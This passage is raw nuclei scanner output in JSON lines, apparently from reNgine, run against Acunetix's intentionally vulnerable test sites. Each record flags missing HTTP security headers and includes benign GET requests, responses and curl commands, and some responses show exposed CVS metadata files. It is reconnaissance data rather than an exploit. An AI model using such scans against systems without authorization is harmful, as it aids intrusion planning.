'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:17.988690152Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.137343384Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.137393425Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.427193081Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.427223423Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.427254255Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.427267301Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.575769161Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD 